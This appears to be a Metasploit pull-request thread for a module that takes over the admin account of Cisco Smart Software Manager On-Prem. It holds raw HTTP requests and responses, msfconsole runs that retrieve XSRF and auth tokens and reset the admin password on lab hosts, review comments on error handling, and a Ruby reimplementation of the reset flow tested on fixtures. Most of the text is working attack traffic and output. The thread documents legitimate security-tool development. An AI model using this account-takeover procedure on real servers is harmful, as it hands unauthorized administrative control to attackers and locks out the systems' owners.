Date: Thu, 29 Aug 2024 21:33:55 GMT
Content-Type: application/json; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN, DENY
X-XSS-Protection: 1; mode=block, 1; mode=block
X-Content-Type-Options: nosniff, nosniff
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: strict-origin-when-cross-origin
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: 0
X_CSL_CONNECT_INFO: {"name"=>"SSM", "version"=>"1.4", "additional_info"=>"", "production"=>true, "capabilities"=>["MULTITIER", "EXPORT_2", "DLC"]}
X_CSL_AGENT_ACTIONS:
X_CSL_NONCE:
X_CSL_TIMESTAMP: 1724967235145
X_CSL_MESSAGE_VERSION: 1.3
ETag: W/"313ec556206adb59fae3cf597925a1d7"
Set-Cookie: XSRF-TOKEN=krzro9yNkEDQp7MI7PS9UqmHC61MTF2yuCRuExbh3Da%2F9VOXj8b6gI2Losj%2F%2F6%2Ber44DPGvdrIBn2g%2B7mmeUJA%3D%3D; path=/; secure
X-Request-Id: fef68288-74e5-48a9-84f8-3b35aafeb03b
X-Runtime: 0.473530
Vary: Origin
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload

{"uid":"admin","auth_token":"2b094fef9c914a53828ee74e0160c39c04664a4f026cb9bba48a36b66feb16c3"}
[+] Retrieved auth_token: 2b094fef9c914a53828ee74e0160c39c04664a4f026cb9bba48a36b66feb16c3
####################
# Request:
####################
POST /backend/reset_password HTTP/1.1
Host: 172.16.199.201:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4; rv:124.0) Gecko/20100101 Firefox/124.0
Cookie: XSRF-TOKEN=krzro9yNkEDQp7MI7PS9UqmHC61MTF2yuCRuExbh3Da%2F9VOXj8b6gI2Losj%2F%2F6%2Ber44DPGvdrIBn2g%2B7mmeUJA%3D%3D; _lic_engine_session=0e84f758847748e8f185cbd782272edf
X-Xsrf-Token: jk1GOsPi9SWb9GhOQJtjjYp9lZ3d2r3q4uNxCUY8WWKjBP4OkKmf5cbYeY5TkHFBjHSdDPpLTNg9HRChyroRcA==
Content-Type: application/json
Content-Length: 189

{"uid":"admin","auth_token":"2b094fef9c914a53828ee74e0160c39c04664a4f026cb9bba48a36b66feb16c3","password":"!1jUbfF9a2dxknM0P!","password_confirmation":"!1jUbfF9a2dxknM0P!","common_name":""}
####################
# Response:
####################
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Aug 2024 21:33:55 GMT
Content-Type: application/json; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN, DENY
X-XSS-Protection: 1; mode=block, 1; mode=block
X-Content-Type-Options: nosniff, nosniff
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: strict-origin-when-cross-origin
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: 0
X_CSL_CONNECT_INFO: {"name"=>"SSM", "version"=>"1.4", "additional_info"=>"", "production"=>true, "capabilities"=>["MULTITIER", "EXPORT_2", "DLC"]}
X_CSL_AGENT_ACTIONS:
X_CSL_NONCE:
X_CSL_TIMESTAMP: 1724967235227
X_CSL_MESSAGE_VERSION: 1.3
ETag: W/"f66db6cb240b6ce9d3427f6b845d8716"
Set-Cookie: XSRF-TOKEN=PoHLG%2FkyL8Zgv2FMOVqVnkrcb8gcY0SixuCKUFAqTxITyHMvqnlFBj2TcIwqUYdSTNVnWTvytZAZHuv43KwHAA%3D%3D; path=/; secure
X-Request-Id: ff2f7cb4-555c-4ce0-a49e-92326972b401
X-Runtime: 0.051686
Vary: Origin
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload

{"error":"Invalid Access","error_message":"Invalid Access"}
[-] Auxiliary aborted due to failure: unexpected-reply: Invalid Access
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) >

Testing

Afterwards, I was able to log in to the application with the password in the NEW_PASSWORD datastore option.

msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.40

[+] Server reachable.
[+] Retrieved XSRF Token: foPj5oBEWs/Pbc5epBuLIW/22ionCaJv5R1c+IO7rpkFaWsERZZXEiG8FU+OmhM0meDWgS/Psc27Lx0LJorb6Q==
[+] Retrieved auth_token: 25ed4c1377c5e68b6740d010663f4a95ec2074c2ce37f0b7c904dc9093365ea2
[+] Password for the admin user was successfully updated: !1jUbfF9a2dxknM0P!
[+] Login at: https://172.16.199.40:8443/#/logIn?redirectURL=%2F
[*] Auxiliary module execution completed

Cleanup and check method added
@h4x-x0r
Contributor Author

h4x-x0r commented Sep 12, 2024

@jheysel-r7 Thank you for your review and feedback, much appreciated. Also apologies for my late reply.

I still need to review the check method based on your suggestions. The current draft sends the requests twice, but I'll update it later, using instance variables like you recommended.

Your output of the vulnerable and patched version was helpful. I've also installed a patched version, and confirmed that it generally works:

msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > check

[+] Server reachable.
[+] Retrieved XSRF Token: ndvhxhaiMjLos6cRnXViA1h4A5l9Nc3poEYZ7ItUoVrehK/8pnk/gSrzx47Wz1vL3rJryzs3g9b8hyMtyAuXrg==
[+] Retrieved auth_token: b0dac3cb0a41ce001d908d05e8f6959a161a4b03d6eb571f7b859876c49340f7
[*] 192.168.217.202:8443 - The target is not exploitable.
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > set RHOSTS 192.168.217.200
RHOSTS => 192.168.217.200
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > check

[+] Server reachable.
[+] Retrieved XSRF Token: SpNSskAkiXrrJdW0a6Z0aGKvvTOEJ2UcfY5b6zm6mVWV9BeJGFjDmfiijiZCGU3SuPKTYD5kCaIm5hUj0iC/CA==
[+] Retrieved auth_token: 16a94bca4d992d92ffdf05053928d984ddd14a2fe12c879c9b22ea963033efa1
[*] 192.168.217.200:8443 - The target appears to be vulnerable.
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > exploit 
[*] Running module against 192.168.217.200

[*] Running automatic check ("set AutoCheck false" to disable)
[+] Server reachable.
[+] Retrieved XSRF Token: fVQWZRQIyL6d/5APSNVPI00Ewv1LvzcukXdRtxwfdagLQ5SwluWwUtm8xygSL/E8VuWqiTIGjhGVyFBlWj3ucA==
[+] Retrieved auth_token: c8a51def35eaac024bc7cc540d89a9713ac9e2c6de5390d02c4725ce7c86a762
[+] The target appears to be vulnerable.
[+] Server reachable.
[+] Retrieved XSRF Token: 14XWEGgpYL48NTu8Wb8/o5jyw1NtCrBiUwqe4K1jN72hklTF6sQYUnh2bJsDRYG8gxOrJxSzCV1XtZ8y60GsZQ==
[+] Retrieved auth_token: 88d2cb42c52b391921fca228042b3eb96a801917cd7e2c114f9165fa22459c4c
[+] Password for the admin user was successfully updated: aklsdlkad232!ASDASDA
[+] Login at: https://192.168.217.200:8443/#/logIn?redirectURL=%2F
[*] Auxiliary module execution completed

Refactored code to remove duplicate requests
@h4x-x0r (Contributor Author) commented Sep 23, 2024

@jheysel-r7 I've updated the module to remove the duplicate requests. Thanks again for your feedback.

@jheysel-r7 (Contributor) left a comment

Hey @h4x-x0r, thanks for making all of those changes. They look great.

One thing I forgot to mention. When the check method shares functionality with the run or exploit method like this you have to be careful to ensure that the check method is still always returning a CheckCode.

If one of the methods called by the check method executes a fail_with, the check method will not be able to return a CheckCode. To work around this issue we can define some custom errors, have the methods raise these errors and then handle those errors accordingly in both the check and run methods.

I've pushed this change along with a few other minor fixes in f254eeb.

Testing

Error handling testing

I hardcoded some values to induce and test the error handling:

Check method handling:

msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.40

[*] Running automatic check ("set AutoCheck false" to disable)
[-] Auxiliary aborted due to failure: unknown: Cannot reliably check exploitability. Check method failed: Msf::Modules::Auxiliary__Admin__Http__Cisco_ssm_onprem_account::MetasploitModule::XsrfTokenError, Failed to get a 200 response from the server. "set ForceExploit true" to override check result.
[*] Auxiliary module execution completed

msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.40

[*] Running automatic check ("set AutoCheck false" to disable)
[+] Server reachable.
[-] Auxiliary aborted due to failure: unknown: Cannot reliably check exploitability. Check method failed: Msf::Modules::Auxiliary__Admin__Http__Cisco_ssm_onprem_account::MetasploitModule::XsrfTokenError, XSRF Token not found "set ForceExploit true" to override check result.
[*] Auxiliary module execution completed

msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.40

[*] Running automatic check ("set AutoCheck false" to disable)
[+] Server reachable.
[+] Retrieved XSRF Token: l2G/NLWAcqMg1nO1tRDyeUJI5Il/stIvc+ljsYi3Fj1mEkkk3j1PgHzCjnZVeECvOV91IT1nCEVnRzyvnUGWhA==
[-] Auxiliary aborted due to failure: unknown: Cannot reliably check exploitability. Check method failed: Msf::Modules::Auxiliary__Admin__Http__Cisco_ssm_onprem_account::MetasploitModule::AuthTokenError, Request /backend/reset_password/generate_code to retrieve auth_token did not return a 200 response "set ForceExploit true" to override check result.
[*] Auxiliary module execution completed

msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.40

[*] Running automatic check ("set AutoCheck false" to disable)
[+] Server reachable.
[+] Retrieved XSRF Token: 2jUjI/jPLdS8S2ktrVV6hKFthpHGm3JPSAAt2k4fO/fVFFzUDgui42iFW/ilya2ICVAf6SuKe53Cj4j2ytklvg==
[+] Retrieved auth_token: 12090a926c5ceccfb850b76f0b2fa273d8c2e9e9aaa5d56ebf2c6095d5880ae4
[-] Auxiliary aborted due to failure: unknown: Cannot reliably check exploitability. Check method failed: Msf::Modules::Auxiliary__Admin__Http__Cisco_ssm_onprem_account::MetasploitModule::ResetPasswordError, Did not receive a 200 responce from backend/reset_password "set ForceExploit true" to override check result.
[*] Auxiliary module execution completed

Run method error handling:

msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.40

[!] AutoCheck is disabled, proceeding with exploitation
[-] Auxiliary aborted due to failure: unexpected-reply: Exploit pre-conditions were not met Msf::Modules::Auxiliary__Admin__Http__Cisco_ssm_onprem_account::MetasploitModule::XsrfTokenError, Failed to get a 200 response from the server.
[*] Auxiliary module execution completed

msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.40

[!] AutoCheck is disabled, proceeding with exploitation
[+] Server reachable.
[-] Auxiliary aborted due to failure: unexpected-reply: Exploit pre-conditions were not met Msf::Modules::Auxiliary__Admin__Http__Cisco_ssm_onprem_account::MetasploitModule::XsrfTokenError, XSRF Token not found
[*] Auxiliary module execution completed


msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.40

[!] AutoCheck is disabled, proceeding with exploitation
[+] Server reachable.
[+] Retrieved XSRF Token: MZOn/v5A2HfHp6c5d0DlyXUVKWso+y0B1mEGvBrIzHVUe2vm3rhlzg6GxtHI02C5i+E7tRqXSq5gIC5VDcc37A==
[-] Auxiliary aborted due to failure: unexpected-reply: Exploit pre-conditions were not met Msf::Modules::Auxiliary__Admin__Http__Cisco_ssm_onprem_account::MetasploitModule::AuthTokenError, Request /backend/reset_password/generate_code to retrieve auth_token did not return a 200 response
[*] Auxiliary module execution completed

msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > run
[*] Running module against 172.16.199.40

[!] AutoCheck is disabled, proceeding with exploitation
[+] Server reachable.
[+] Retrieved XSRF Token: HOti6Sne63dXErPIBkHwc5pEiXTMiQe/9UCNYvPUILOk0iesmWcuzunmf5tNM1nczCaNytGBvss9MdxvmFJupw==
[+] Retrieved auth_token: 60f4890d5bb36eab94c776b8f8e469506be1122a4e77ce4155f7dc214aa4f9d8
[-] Auxiliary aborted due to failure: unexpected-reply: Exploit pre-conditions were not met Msf::Modules::Auxiliary__Admin__Http__Cisco_ssm_onprem_account::MetasploitModule::ResetPasswordError, Did not receive a 200 responce from backend/reset_password
[*] Auxiliary module execution completed

Testing was as expected on a vulnerable version:

msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.40

[*] Running automatic check ("set AutoCheck false" to disable)
[+] Server reachable.
[+] Retrieved XSRF Token: U4WTxHe4jHbgxH2TYLDyXqttSdPLET1MteWfS5nx7eTdbpmgue9rTTps1SVDawewbOk0ZWahrQXvB824sRDqCg==
[+] Retrieved auth_token: 806cc091a24b78f7bb9e19b4e28b641aecc6781aec101f4a0f16de9f6f3d2b06
[+] The target appears to be vulnerable.
[+] Password for the admin user was successfully updated: t9YKVWigDO2y1Tkc!
[+] Login at: https://172.16.199.40:8443/#/logIn?redirectURL=%2F
[*] Auxiliary module execution completed

AutoCheck set to false:

msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.50

[!] AutoCheck is disabled, proceeding with exploitation
[+] Server reachable.
[+] Retrieved XSRF Token: 3SQKRCpHP9j2xSoY/471jNScqjeCsy24+mhlx5oXhmbzXGW5h/Ov3WEyVCwNVXO6iNgGUiiS9IcUNbrQTnOlWQ==
[+] Retrieved auth_token: 455cdc53c6a1336bba8a01049057ab420b2b6e3447093a7abd5b87de393bb9e7
[+] Password for the admin user was successfully updated: asdfasdfASDASDASD39!
[+] Login at: https://172.16.199.50:8443/#/logIn?redirectURL=%2F
[*] Auxiliary module execution completed

@jheysel-r7 (Contributor) commented on lines +123 to +124:

    json = res.get_json_document
    raise ResetPasswordError, "There was an error resetting the password: #{json['error_message']}" if json['error_message']

Before this check was added, if AutoCheck was set to false and the NEW_PASSWORD did not contain an upper case letter, the module would fail with a non-descriptive error message, because an error response has a response code of 200.

The module would continue, the response to backend/auth/identity/callback would also be a 200 and the error message would be:

msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > run
[*] Running module against 172.16.199.40

[!] AutoCheck is disabled, proceeding with exploitation
[+] Server reachable.
[+] Retrieved XSRF Token: N8bloAwZoPRD4kPc3Vl0XNOps4Yideqk0ro75xul5Sohz2M1xjTp08KNB0H5D2mpp6/sFtckmmP1LvPddCbMHg==
[+] Retrieved auth_token: b1d17afaac83730edac30dd2242eafc0adc0da4ef9b505ba5d0682c220f75b6b
[-] Auxiliary aborted due to failure: unexpected-reply: The requested user is not found.
[*] Auxiliary module execution completed

Now this error message is displayed like so:

msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > run
[*] Running module against 172.16.199.50

[*] Running automatic check ("set AutoCheck false" to disable)
[+] Server reachable.
[+] Retrieved XSRF Token: amUaFSgVZhNwx5qSUdX4Qv5ZVh4nPk8jsTv2etORqHP6oHbOYqRgt7UNQ1lYETgu2sZzw8Ja30Rqp12a9UbmjQ==
[+] Retrieved auth_token: 791252bb6a863cc21967d30c11b1a599efda1a100d45f6d8685145f52c8087ed
[-] Auxiliary aborted due to failure: unknown: Cannot reliably check exploitability. Check method failed: Msf::Modules::Auxiliary__Admin__Http__Cisco_ssm_onprem_account::MetasploitModule::ResetPasswordError, There was an error resetting the password: Password should contain at least one uppercase and one lower case "set ForceExploit true" to override check result.
[*] Auxiliary module execution completed

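The two review points above (helpers raising custom errors so that check always returns a CheckCode while run turns the same errors into fail_with, and the reset endpoint answering HTTP 200 for a rejected password so the JSON body has to be inspected for error_message) can be demonstrated outside the framework. The following is an added example, not the merged module's code: it reuses the endpoint paths and messages visible in the output above, but the header name, JSON field names, the "status":"denied" discriminator for a patched host, the CheckResult and FakeResponse stand-ins and all fixture responses are constructed for this example and are not the real SSM On-Prem API.

```ruby
# Added example (not the module's code): framework-free version of the
# "raise custom errors in shared helpers, translate them in check and run"
# pattern, plus the HTTP-200-with-error_message check.
require 'json'

# Stand-in for Msf::Exploit::CheckCode: a code symbol plus a reason string.
CheckResult = Struct.new(:code, :reason)

# Stand-in for the exception fail_with raises inside the framework.
class ModuleFailure < StandardError; end

# Constructed fake HTTP response; no network is involved.
FakeResponse = Struct.new(:code, :headers, :body) do
  def get_json_document
    JSON.parse(body.to_s)
  rescue JSON::ParserError
    {}
  end
end

class AccountTakeoverModule
  # Custom errors: a helper aborts without deciding how the caller reacts.
  class XsrfTokenError < StandardError; end
  class AuthTokenError < StandardError; end
  class ResetPasswordError < StandardError; end
  HELPER_ERRORS = [XsrfTokenError, AuthTokenError, ResetPasswordError].freeze

  # responses: { path => FakeResponse } fixture replacing send_request_cgi.
  def initialize(responses)
    @responses = responses
  end

  def send_request(path)
    @responses[path]
  end

  def retrieve_xsrf_token
    res = send_request('/')
    raise XsrfTokenError, 'Failed to get a 200 response from the server.' unless res && res.code == 200
    token = res.headers['X-XSRF-TOKEN'] # hypothetical header name
    raise XsrfTokenError, 'XSRF Token not found' if token.nil? || token.empty?
    @xsrf_token = token
  end

  def retrieve_auth_token
    res = send_request('/backend/reset_password/generate_code')
    unless res && res.code == 200
      raise AuthTokenError, 'Request /backend/reset_password/generate_code to retrieve auth_token did not return a 200 response'
    end
    @auth_token = res.get_json_document['auth_token']
  end

  def reset_password
    res = send_request('/backend/reset_password')
    raise ResetPasswordError, 'Did not receive a 200 response from backend/reset_password' unless res && res.code == 200
    json = res.get_json_document
    # A rejected password still comes back as HTTP 200; only the body tells.
    raise ResetPasswordError, "There was an error resetting the password: #{json['error_message']}" if json['error_message']
    json
  end

  # Always returns a CheckResult, even when a helper raises.
  def check
    retrieve_xsrf_token
    retrieve_auth_token
    json = reset_password
    # Hypothetical discriminator: a patched backend answers "status":"denied".
    return CheckResult.new(:safe, 'The target is not exploitable.') if json['status'] == 'denied'
    CheckResult.new(:appears, 'The target appears to be vulnerable.')
  rescue *HELPER_ERRORS => e
    CheckResult.new(:unknown, "Check method failed: #{e.class}, #{e.message}")
  end

  # Same helpers, but errors become a module failure instead of a CheckResult.
  def run(new_password)
    retrieve_xsrf_token
    retrieve_auth_token
    reset_password
    "Password for the admin user was successfully updated: #{new_password}"
  rescue *HELPER_ERRORS => e
    fail_with('unexpected-reply', "Exploit pre-conditions were not met #{e.class}, #{e.message}")
  end

  def fail_with(reason, msg)
    raise ModuleFailure, "Auxiliary aborted due to failure: #{reason}: #{msg}"
  end
end

# Constructed fixtures for the four situations seen in the review output.
OK_HEADERS = { 'X-XSRF-TOKEN' => 'dGVzdA==' }.freeze
VULNERABLE = {
  '/' => FakeResponse.new(200, OK_HEADERS, ''),
  '/backend/reset_password/generate_code' => FakeResponse.new(200, {}, '{"auth_token":"deadbeef"}'),
  '/backend/reset_password' => FakeResponse.new(200, {}, '{"status":"ok"}')
}.freeze
PATCHED = VULNERABLE.merge('/backend/reset_password' => FakeResponse.new(200, {}, '{"status":"denied"}'))
WEAK_PASSWORD = VULNERABLE.merge('/backend/reset_password' => FakeResponse.new(200, {},
  '{"error_message":"Password should contain at least one uppercase and one lower case"}'))
NO_TOKEN = VULNERABLE.merge('/' => FakeResponse.new(200, {}, ''))

puts AccountTakeoverModule.new(VULNERABLE).check.reason
puts AccountTakeoverModule.new(WEAK_PASSWORD).check.reason
```

With the WEAK_PASSWORD fixture, check returns an :unknown result carrying the ResetPasswordError text rather than aborting, and run on the same fixture raises the module failure with the "unexpected-reply" reason, which is the split in behaviour the review comment asks for.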
@h4x-x0r (Contributor Author) commented Sep 23, 2024

@jheysel-r7 Thank you for all the reliability improvements and explanations.

@jheysel-r7 jheysel-r7 merged commit d11c2be into rapid7:master Sep 24, 2024
36 checks passed
@jheysel-r7 (Contributor)
Release Notes

This is a new module which exploits an account takeover vulnerability in Cisco Smart Software Manager (SSM) On-Prem <= 8-202206, by changing the password of the admin user to one that is attacker-controlled.

Labels
docs module rn-modules release notes for new or majorly enhanced modules
4 participants